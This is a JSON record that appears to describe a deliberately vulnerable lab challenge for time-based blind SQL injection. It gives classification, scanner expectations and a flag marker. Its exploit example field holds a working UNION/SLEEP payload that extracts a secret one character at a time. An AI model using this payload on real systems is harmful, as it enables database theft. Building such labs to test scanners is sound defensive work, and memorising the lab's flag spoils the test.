{"detect":{"cwe":"CWE-89","exploit_examples":["/blind-time/?username=nonexistent'+UNION+SELECT+IF(SUBSTRING((SELECT+value+FROM+secrets+WHERE+name='sqli-blind-time'),1,1)='V',SLEEP(2),'x')--+"],"notes":"Only signal is request latency. Scanners without a timing oracle will miss this.","owasp":"A03:2021 \u2014 Injection (SQLi)","scanner_should_fire":true,"sinks":["f-string concatenation; response shape independent of result"],"subtype":"blind-time-based","success_markers":["VULNLAB{sqli-blind-time-based-oracle}"],"tags":["blind","time-based","sleep"]},"lab_url":"/blind-time/","sink":"string-concatenated SELECT (no response variation)","slug":"blind-time","source_url":"/source/blind-time","summary":"Username availability returns identical responses; only query time leaks.","title":"Blind SQLi (time-based)","vulnerable":true}